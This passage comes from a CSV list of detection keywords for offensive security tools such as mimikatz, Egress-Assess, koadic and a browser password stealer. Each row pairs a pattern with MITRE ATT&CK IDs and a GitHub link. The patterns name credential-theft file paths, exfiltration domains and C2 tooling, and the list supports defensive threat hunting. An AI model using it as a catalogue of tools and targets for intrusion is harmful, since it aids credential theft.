tools,https://github.com/NetSPI/MicroBurst,1,1,N/A,6,10,1709,280,2023-09-21T15:53:06Z,2018-07-16T16:47:20Z -*MicroBurst-Misc.psm1*,offensive_tool_keyword,MicroBurst,A collection of scripts for assessing Microsoft Azure security,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/NetSPI/MicroBurst,1,1,N/A,6,10,1709,280,2023-09-21T15:53:06Z,2018-07-16T16:47:20Z -*MicroBurst-MSOL*,offensive_tool_keyword,MicroBurst,A collection of scripts for assessing Microsoft Azure security,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/NetSPI/MicroBurst,1,1,N/A,6,10,1709,280,2023-09-21T15:53:06Z,2018-07-16T16:47:20Z 
-*microchsse.strangled.net*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,1,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*microlilics.crabdance.com*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,1,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*micronaoko.jumpingcrab.com*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,1,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*microplants.strangled.net*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,1,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*microsoft-edge/cookies.txt*,offensive_tool_keyword,Browser-password-stealer,This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!,T1003.002 - T1056.001,TA0006 - TA0004,N/A,N/A,Credential 
Access,https://github.com/henry-richard7/Browser-password-stealer,1,0,N/A,10,4,304,51,2023-09-03T10:32:39Z,2020-09-15T09:23:56Z -*microsoft-edge/credit_cards.txt*,offensive_tool_keyword,Browser-password-stealer,This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!,T1003.002 - T1056.001,TA0006 - TA0004,N/A,N/A,Credential Access,https://github.com/henry-richard7/Browser-password-stealer,1,0,N/A,10,4,304,51,2023-09-03T10:32:39Z,2020-09-15T09:23:56Z -*microsoft-edge/history.txt*,offensive_tool_keyword,Browser-password-stealer,This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!,T1003.002 - T1056.001,TA0006 - TA0004,N/A,N/A,Credential Access,https://github.com/henry-richard7/Browser-password-stealer,1,0,N/A,10,4,304,51,2023-09-03T10:32:39Z,2020-09-15T09:23:56Z -*microsoft-edge/login_data.txt*,offensive_tool_keyword,Browser-password-stealer,This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!,T1003.002 - T1056.001,TA0006 - TA0004,N/A,N/A,Credential Access,https://github.com/henry-richard7/Browser-password-stealer,1,0,N/A,10,4,304,51,2023-09-03T10:32:39Z,2020-09-15T09:23:56Z -*microsoft-edge\cookies.txt*,offensive_tool_keyword,Browser-password-stealer,This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!,T1003.002 - T1056.001,TA0006 - TA0004,N/A,N/A,Credential Access,https://github.com/henry-richard7/Browser-password-stealer,1,0,N/A,10,4,304,51,2023-09-03T10:32:39Z,2020-09-15T09:23:56Z -*microsoft-edge\credit_cards.txt*,offensive_tool_keyword,Browser-password-stealer,This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!,T1003.002 - T1056.001,TA0006 - 
TA0004,N/A,N/A,Credential Access,https://github.com/henry-richard7/Browser-password-stealer,1,0,N/A,10,4,304,51,2023-09-03T10:32:39Z,2020-09-15T09:23:56Z -*microsoft-edge\history.txt*,offensive_tool_keyword,Browser-password-stealer,This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!,T1003.002 - T1056.001,TA0006 - TA0004,N/A,N/A,Credential Access,https://github.com/henry-richard7/Browser-password-stealer,1,0,N/A,10,4,304,51,2023-09-03T10:32:39Z,2020-09-15T09:23:56Z -*microsoft-edge\login_data.txt*,offensive_tool_keyword,Browser-password-stealer,This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!,T1003.002 - T1056.001,TA0006 - TA0004,N/A,N/A,Credential Access,https://github.com/henry-richard7/Browser-password-stealer,1,0,N/A,10,4,304,51,2023-09-03T10:32:39Z,2020-09-15T09:23:56Z -*microsploit.git*,offensive_tool_keyword,BruteSploit,Fast and easy create backdoor office exploitation using module metasploit packet . Microsoft Office . Open Office . Macro attack . Buffer Overflow,T1587 - T1588 - T1608,N/A,N/A,N/A,Exploitation tools,https://github.com/screetsec/Microsploit,1,1,N/A,N/A,5,430,133,2017-07-11T16:28:27Z,2017-03-16T05:26:55Z -*Midl2Bytes.exe*,offensive_tool_keyword,SharpSystemTriggers,Collection of remote authentication triggers in C#,T1078 - T1059.001 - T1550,TA0002 - TA0005 - TA0040,N/A,N/A,Lateral Movement - Privilege Escalation,https://github.com/cube0x0/SharpSystemTriggers,1,1,N/A,10,4,366,43,2023-08-19T22:45:20Z,2021-09-12T18:18:15Z -*--mifi-username * --mifi-password * --number +*,offensive_tool_keyword,SMShell,PoC for a SMS-based shell. 
Send commands and receive responses over SMS from mobile broadband capable computers,T1021.001 - T1059.006 - T1071.004 - T1069.003,TA0002 - TA0011 - TA0009 - TA0040,N/A,N/A,C2,https://github.com/persistent-security/SMShell,1,0,N/A,10,10,272,20,2023-05-22T10:40:16Z,2023-05-22T08:26:44Z -*MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqKav9bmrSMSPwnxA3ul*,offensive_tool_keyword,golang_c2,C2 written in Go for red teams aka gorfice2k,T1071 - T1021 - T1043 - T1090,TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/m00zh33/golang_c2,1,0,N/A,10,10,4,8,2019-03-18T00:46:41Z,2019-03-19T02:39:59Z -*MIIEoQIBAAKCAQEArJqP/6XFBa88x/DUootMmSzYa3MxcTV9FjNYUomqbQlGzuHa*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*MIIEowIBAAKCAQEAvZtOCbMyFKJN3n89nctTfYLSeiCTNG01rAFl06hMkobyzr0c*,offensive_tool_keyword,365-Stealer,365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack,T1111 - T1566.001 - T1078.004,TA0004 - TA0001 - TA0040,N/A,N/A,Phishing,https://github.com/AlteredSecurity/365-Stealer,1,0,N/A,10,3,288,74,2023-06-15T19:56:12Z,2020-09-20T18:22:36Z -*MIIEpAIBAAKCAQEAqqKav9bmrSMSPwnxA3ulIleTPGiL9LGtdROute8ncU0HzPyL*,offensive_tool_keyword,golang_c2,C2 written in Go for red teams aka gorfice2k,T1071 - T1021 - T1043 - T1090,TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/m00zh33/golang_c2,1,0,N/A,10,10,4,8,2019-03-18T00:46:41Z,2019-03-19T02:39:59Z -*mimi32.exe *,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,0,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*mimi64.exe *,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,0,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*mimidrv (mimikatz)*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,0,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*mimidrv*,offensive_tool_keyword,mimikatz,mimikatz exploitation ,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Credential Access,https://github.com/gentilkiwi/mimikatz,1,0,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*mimidrv.pdb*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*mimidrv.sys*,offensive_tool_keyword,mimikatz,mimikatz exploitation ,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Credential Access,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*mimidrv.sys*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*mimidrv.sys*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*mimidrv.zip*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*mimikatz -Command *,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,0,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*mimikatz for Windows*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,0,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*Mimikatz*,offensive_tool_keyword,mimikatz,Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets.,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*Mimikatz.cs*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*mimikatz.exe*,offensive_tool_keyword,Executable_Files,Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well,T1071 - T1071.001 - T1105 - T1041 - T1102,TA0011 - TA0005 - TA0010,N/A,N/A,Exploitation tools,https://github.com/reveng007/Executable_Files,1,1,N/A,10,1,7,2,2023-09-07T08:36:28Z,2021-12-10T15:04:35Z -*mimikatz.exe*,offensive_tool_keyword,FilelessPELoader,Loading Remote AES Encrypted PE in memory - Decrypted it and 
run it,T1027.001 - T1059.001 - T1071,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/FilelessPELoader,1,1,N/A,10,8,727,148,2023-08-29T21:46:11Z,2023-02-08T16:59:33Z -*mimikatz.exe*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*mimikatz.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/SecureAuthCorp/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*mimikatz.raw*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*mimikatz_cred_collector.py*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z -*mimikatz_dotnet2js*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*mimikatz_dynwrapx*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. 
The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*mimikatz_tashlib*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*mimikatz_trunk*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,0,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*mimikatz_x64.exe*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*mimikatz_x86.exe*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*MimikatzByPowerShellForDomain.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - 
T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*MimikatzOnLocal.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*mimikittenz*,offensive_tool_keyword,mimikittenz,mimikittenz is a post-exploitation powershell tool that utilizes the Windows function ReadProcessMemory() in order to extract plain-text passwords from various target processes mimikittenz can also easily extract other kinds of juicy info from target processes using regex patterns including but not limited Encryption Keys & All the other goodstuff,T1003 - T1216 - T1552 - T1002 - T1083,TA0003 - TA0008 - TA0006,N/A,N/A,POST Exploitation tools,https://github.com/orlyjamie/mimikittenz,1,1,N/A,10,10,1792,352,2020-10-16T01:20:30Z,2016-07-04T13:57:18Z -*mimilib (mimikatz)*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,0,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*mimilib for Windows (mimikatz)*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,0,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*mimilib*,offensive_tool_keyword,mimikatz,mimikatz exploitation ,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Credential Access,https://github.com/gentilkiwi/mimikatz,1,0,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*mimilib.dll*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*mimilib.dll*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*mimilib.py*,offensive_tool_keyword,impacket,Impacket is a 